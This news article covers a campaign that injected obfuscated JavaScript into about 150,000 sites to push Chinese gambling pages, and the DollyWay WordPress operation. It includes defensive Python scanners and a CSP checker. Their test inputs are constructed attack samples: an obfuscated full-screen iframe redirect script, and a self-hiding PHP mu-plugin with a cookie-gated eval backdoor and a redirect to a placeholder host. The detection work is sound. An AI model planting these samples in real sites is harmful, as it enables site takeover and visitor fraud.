
Website intrusions impact nearly 150,000 domains - Diversion to gambling platforms ensues

Multitude of Sites Infiltrated to Advertise Chinese Betting Platforms - Experts Warn of Growing Complexity in Cyber Assaults


By Yannick Schroth, Edited by Angela Burke, Published on: 28.03.2025, Updated on: 24.04.2025

  • Massive Redirection: 150K Legitimate Websites Hit by Chinese Gambling Scams
  • Crafty Hackers Disguise Attacks with Fake Branding and Obfuscated Code
  • An Older Hacker Operation, DollyWay, Also Uses Manipulated WordPress Sites for Fraud Links

Cyber attackers have struck again, this time infecting approximately 150,000 legitimate websites with sneaky JavaScript code - leading users down a rabbit hole to Chinese gambling platforms. © Pixabay/Pixabay

Widespread Malware Advance Leads to Gambling Platform Promotion

According to GBHackers, a large cyber campaign has infected around 150,000 legitimate websites with malicious JavaScript whose purpose is to advertise Chinese-language gambling platforms. The injected script inserts an iframe that covers the whole viewport (a full-screen overlay) and loads a page imitating well-known providers such as Bet365.

How Hackers Make a Quick Buck off Such Attacks

The objective of such attacks is straightforward: financial gain through redirection. The attackers inject code into third-party websites that automatically sends visitors - usually without their noticing - to illegal gambling offers or fake shops. The perpetrators then earn money much as in legitimate affiliate marketing: a commission for each visitor who lands on such a site and potentially spends money there.

Many attackers also sell the traffic through broker networks. These platforms bundle web traffic and resell it to the highest bidder, regardless of whether it was obtained fraudulently. The buyers end up receiving visitors that were delivered by cyberattacks of exactly this kind.

In short, the more people who are misled into visiting the manipulated websites, the more money the attackers make - usually at the visitors' expense.

According to a security analyst, the campaign was first detected in February 2025 with around 35,000 infected sites and has grown substantially since. At present, more than 135,800 compromised domains can be identified.

How Attackers Conceal the Redirection

The attackers camouflage their malware by encoding it with HTML entities and hexadecimal escape sequences, and host the payload on specific domains. The encoded script looks like noise to a human reader and to simple string-matching scanners, but the browser decodes and executes it exactly as if it were written in the clear.

The campaign shows how cybercriminals adapt, extend their reach, and adopt new concealment methods. Attacks of this kind are on the rise, and new examples are uncovered continuously.

The Goal Is to Redirect Users Unnoticed, Especially Visitors from China, Hong Kong, and the USA

The JavaScript payload detects mobile browsers and adapts both the overlay and the redirection target dynamically; some variants also key their behaviour on recognised keywords. In addition, some variants of the campaign imitate the branding of well-known providers such as Bet365 to appear authentic.
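The three traits described above - an obfuscated script, a mobile-browser check, and a full-screen iframe or outright redirect to a foreign host - can be recovered from a page with a small decoder. The following is an added example written for this article, not code from GBHackers or from the campaign itself. The sample page, the placeholder domain example-bet.invalid and the scoring weights are constructed for the demo; the indicators are generic and are not signatures for any specific campaign.

```python
"""Decode HTML-entity / \\xNN / String.fromCharCode-obfuscated scripts in a
page and flag the injected-redirect pattern described in the article.
Added example; sample page and domains are constructed, not observed IOCs."""
import html
import re

# Constructed sample: one injected <script> whose strings are hidden behind
# HTML entities and \xNN escapes. The domain is a placeholder.
SAMPLE_HTML = """<html><body><h1>Welcome</h1>
<script>
var u = "&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;example-bet.invalid/land";
if (/\\x4d\\x6f\\x62\\x69\\x6c\\x65|\\x41\\x6e\\x64\\x72\\x6f\\x69\\x64/.test(navigator.userAgent)) {
  var f = document.createElement("\\x69\\x66\\x72\\x61\\x6d\\x65");
  f.src = u; f.style = "position:fixed;top:0;left:0;width:100%;height:100%;z-index:99999;border:0";
  document.body.appendChild(f);
} else { location.href = u; }
</script>
</body></html>"""

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.S | re.I)
HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")
UNICODE_ESCAPE = re.compile(r"\\u([0-9a-fA-F]{4})")
FROMCHARCODE = re.compile(r"String\.fromCharCode\(([\d,\s]+)\)")

# Each indicator maps to one trait from the article (order/fallback is generic).
INDICATORS = {
    "fullscreen_iframe": re.compile(r"iframe.{0,400}?position\s*:\s*fixed", re.S | re.I),
    "ua_mobile_check": re.compile(r"(?s)(?=.*navigator\.userAgent)(?=.*(Mobile|Android|iPhone|iPad))"),
    "redirect": re.compile(r"(location\.(href|replace)|window\.location)\s*[=(]", re.I),
}
EXTERNAL_URL = re.compile(r"https?://([a-z0-9.-]+)", re.I)


def deobfuscate(src, max_rounds=5):
    """Peel HTML entities, \\xNN / \\uNNNN escapes and String.fromCharCode()
    repeatedly until the text stops changing (layered encodings are common)."""
    for _ in range(max_rounds):
        prev = src
        src = html.unescape(src)
        src = HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), src)
        src = UNICODE_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), src)
        src = FROMCHARCODE.sub(
            lambda m: '"' + "".join(chr(int(n)) for n in m.group(1).split(",") if n.strip()) + '"',
            src)
        if src == prev:
            break
    return src


def scan_page(html_text, allowed_hosts):
    """Return one finding per <script> block: which indicators fired, which
    hosts outside `allowed_hosts` it references, and a simple 0-5 score."""
    findings = []
    for i, m in enumerate(SCRIPT_RE.finditer(html_text)):
        raw = m.group(1)
        decoded = deobfuscate(raw)
        hits = {name: bool(rx.search(decoded)) for name, rx in INDICATORS.items()}
        hits["obfuscated"] = decoded != raw  # something had to be decoded to read it
        hits["foreign_hosts"] = sorted(
            {h.lower() for h in EXTERNAL_URL.findall(decoded)} - {h.lower() for h in allowed_hosts})
        score = sum(1 for k in ("fullscreen_iframe", "ua_mobile_check", "redirect", "obfuscated")
                    if hits[k]) + (1 if hits["foreign_hosts"] else 0)
        findings.append({"script_index": i, "score": score, "decoded": decoded, **hits})
    return findings


if __name__ == "__main__":
    for f in scan_page(SAMPLE_HTML, {"www.example.com"}):
        print({k: v for k, v in f.items() if k != "decoded"})
```

Run it over a saved copy of a suspect page (`scan_page(open("index.html").read(), {"your-domain.example"})`) and review any script with a score of 3 or more by reading its `decoded` text; the `obfuscated` flag alone fires on harmless `&amp;` in legitimate inline scripts, so it is a weight, not a verdict.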

A Parallel Attack: DollyWay Has Been Active for Years

In parallel with the current campaign, a second, long-running operation called DollyWay World Domination has been active since 2016 and has infected more than 20,000 websites, as reported by GoDaddy. Its primary target is WordPress sites, into which the attackers inject manipulated PHP plugins, including must-use (mu) plugins that load on every request and cannot be deactivated from the admin panel.

The malware specifically disables security features, deletes administrator accounts, and steals legitimate credentials. Visitors to affected sites are then routed through a Traffic Direction System (TDS), a routing layer built on a network of compromised websites, to fraudulent pages belonging to the criminal network VexTrio. In some cases the perpetrators also monetise the traffic through ad networks such as PropellerAds.

VexTrio is notorious for distributing casino content, malware, and fraudulent offers. Webmasters are advised to check their sites regularly, remove suspicious redirects, and deploy protective measures such as a Content Security Policy - all the more so because hacking incidents are common in the iGaming sector, as seen for instance at stake.com or Evolution.
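A Content Security Policy helps here only if it actually forbids the injected code from running: an inline <script> dropped into the HTML runs under any policy that lists 'unsafe-inline' for script-src, and a policy that does block it is delivered as an HTTP header, which an attacker with PHP write access can remove. The example below is added for this article (not from GoDaddy, GBHackers or any of the projects named) and evaluates a weak and a hardened policy against the two things the injected payload needs: executing inline script and framing a third-party origin. The policies, the nonce value and the placeholder origin example-bet.invalid are constructed.

```python
"""Check whether a Content-Security-Policy header would let the injected
overlay pattern run: inline script execution and framing a foreign origin.
Added example; the policies and the attacker origin are constructed."""

# Constructed policies for the demo. The weak one is a common real-world shape.
WEAK_POLICY = "default-src 'self'; script-src 'self' 'unsafe-inline'; img-src *"
HARDENED_POLICY = ("default-src 'self'; script-src 'self' 'nonce-r4nd0m'; "
                   "frame-src 'none'; base-uri 'self'; form-action 'self'")
ATTACKER_ORIGIN = "https://example-bet.invalid"  # placeholder, not an IOC

# Fetch-directive fallback chains from the CSP spec: a missing frame-src falls
# back to child-src, then default-src; a missing script-src to default-src.
FALLBACK = {
    "script-src": ["script-src", "default-src"],
    "frame-src": ["frame-src", "child-src", "default-src"],
}


def parse_csp(policy):
    """Split a CSP header into {directive: [source expressions]} (lower-cased)."""
    directives = {}
    for part in policy.split(";"):
        tokens = part.lower().split()
        if tokens:
            directives[tokens[0]] = tokens[1:]
    return directives


def effective_sources(directives, name):
    """Sources that govern `name` after fallback; None means no restriction."""
    for d in FALLBACK[name]:
        if d in directives:
            return directives[d]
    return None


def allows_inline_script(policy):
    """True if an injected inline <script> (no nonce, no hash) would execute."""
    srcs = effective_sources(parse_csp(policy), "script-src")
    if srcs is None:
        return True
    if "'none'" in srcs:
        return False
    nonce_or_hash = any(s.startswith("'nonce-") or s.startswith("'sha") for s in srcs)
    # Browsers ignore 'unsafe-inline' once a nonce or hash source is present.
    return "'unsafe-inline'" in srcs and not nonce_or_hash


def allows_frame_from(policy, origin):
    """True if <iframe src="origin/..."> would load. origin like 'https://host'."""
    srcs = effective_sources(parse_csp(policy), "frame-src")
    if srcs is None:
        return True
    if "'none'" in srcs:
        return False
    scheme, host = origin.lower().split("://", 1)
    for s in srcs:
        if s == "*" or s == origin.lower() or s == scheme + ":":
            return True
        if s.startswith("*.") and host.endswith(s[1:]):
            return True
        if not s.startswith("'") and "://" not in s and s == host:
            return True
    return False  # 'self' never matches a third-party origin


if __name__ == "__main__":
    for label, pol in (("weak", WEAK_POLICY), ("hardened", HARDENED_POLICY)):
        print(label, "inline script:", allows_inline_script(pol),
              "frame from attacker:", allows_frame_from(pol, ATTACKER_ORIGIN))
```

Note the asymmetry the weak policy reveals: `default-src 'self'` already stops the attacker's iframe, yet the injected script still executes and can redirect the whole tab with `location.href`, which CSP does not govern. Keeping the script from running at all (nonce- or hash-based script-src, no 'unsafe-inline') is therefore the setting that matters, and it needs to be served from a layer the attacker cannot edit.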

(Enrichment) Potential Revenue Streams:

  • Affiliate Programs: The attackers earn commissions for each redirected user who signs up on, or deposits money with, a gambling platform via their link.
  • Malicious Advertising: Users on the redirected sites are bombarded with ads, some of them harmful; each click or interaction can generate revenue for the attacker.
  • Data Theft and Sale: Injected JavaScript can also harvest sensitive user data such as login credentials, payment details, or other personal information, which is then sold on underground markets.
  • Phishing and Scams: The redirect destinations may be phishing pages that trick users into entering sensitive information or downloading malware, adding further fraudulent income.

(Enrichment) Common Attack Methods:

  • Exploiting Vulnerabilities: Attackers exploit vulnerabilities in plugins, themes, or server configuration to inject malware into legitimate sites.
  • Evasion Techniques: The malware hides its plugin from the admin panel's plugin list, performs redirects server-side in PHP so nothing suspicious appears in the page source, and uses cookie-gated backdoors to maintain access.
  • Persistent Attacks: Automated bot networks can reinfect a site after a clean-up attempt, keeping the redirects running and the attackers' income flowing.
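Because mu-plugins run on every request and never show up as deactivatable plugins, a triage pass over that directory is a good first step when a WordPress site is found redirecting. The following is an added example written for this article, not DollyWay's code and not from GoDaddy's report: it scans PHP sources for the traits listed above (a self-hiding plugin, a server-side Location header to a foreign host, a cookie-gated eval, packed code, and runtime fetches from remote hosts). The sample plugin, its cookie name and the placeholder domain tds.example.invalid are constructed; the patterns are generic indicators, not signatures for a specific campaign.

```python
"""Static triage of WordPress mu-plugins for the self-hiding / server-side
redirect / cookie-backdoor traits described above.
Added example; the sample plugin source is constructed."""
import os
import re

# (name, regex, why it matters). Each entry corresponds to a trait listed above.
INDICATORS = [
    ("hides_from_plugin_list",
     re.compile(r"add_filter\(\s*['\"]all_plugins['\"]"),
     "filters the plugin list shown in the admin panel (plugin hides itself)"),
    ("server_side_redirect",
     re.compile(r"header\(\s*['\"]Location:\s*https?://", re.I),
     "PHP-level redirect to an external URL before any HTML is sent"),
    ("cookie_gated_backdoor",
     re.compile(r"\$_COOKIE\[[^\]]+\].{0,200}?\b(eval|system|include|assert)\s*\(", re.S),
     "runs code only when a specific cookie is present"),
    ("obfuscated_eval",
     re.compile(r"eval\s*\(\s*(base64_decode|gzinflate|str_rot13|strrev)\s*\("),
     "decodes and executes hidden PHP at request time"),
    ("remote_fetch_at_runtime",
     re.compile(r"(wp_remote_get|file_get_contents|curl_exec)\s*\([^)]*https?://", re.I),
     "pulls content from a remote host at runtime (used to re-fetch payloads)"),
]

# Constructed sample in the style of the traits above (not real malware).
SAMPLE_MU_PLUGIN = r'''<?php
/* Plugin Name: Core Cache Helper */
add_filter('all_plugins', function ($plugins) {
    unset($plugins['cache-helper.php']); return $plugins;
});
if (isset($_COOKIE['_wp_sess']) && md5($_COOKIE['_wp_sess']) === 'd41d8cd98f00b204e9800998ecf8427e') {
    eval(base64_decode($_POST['c']));
}
if (!is_admin() && !preg_match('/bot|crawl/i', $_SERVER['HTTP_USER_AGENT'] ?? '')) {
    header('Location: https://tds.example.invalid/r?s=' . $_SERVER['HTTP_HOST']);
    exit;
}
'''


def scan_php_source(src):
    """Return the (indicator, reason) pairs that fire on one PHP source text."""
    return [(name, reason) for name, rx, reason in INDICATORS if rx.search(src)]


def scan_mu_plugins(wp_root):
    """Walk wp-content/mu-plugins under `wp_root` and triage every .php file.
    Returns {path: [(indicator, reason), ...]} for files with at least one hit."""
    mu_dir = os.path.join(wp_root, "wp-content", "mu-plugins")
    report = {}
    if not os.path.isdir(mu_dir):
        return report
    for dirpath, _, files in os.walk(mu_dir):
        for fn in files:
            if not fn.endswith(".php"):
                continue
            path = os.path.join(dirpath, fn)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = scan_php_source(fh.read())
            if hits:
                report[path] = hits
    return report


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:  # python scan_mu.py /var/www/html
        for path, hits in scan_mu_plugins(sys.argv[1]).items():
            print(path)
            for name, reason in hits:
                print("   ", name, "-", reason)
    else:  # no path given: demonstrate on the constructed sample
        for name, reason in scan_php_source(SAMPLE_MU_PLUGIN):
            print(name, "-", reason)
```

A hit is a reason to read the file, not proof of compromise: some legitimate management plugins filter all_plugins or fetch remote content. Pair the scan with a check of the administrator list and of file modification times in the same directory, since the article notes that the malware deletes admin accounts and that sites get reinfected after clean-up.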

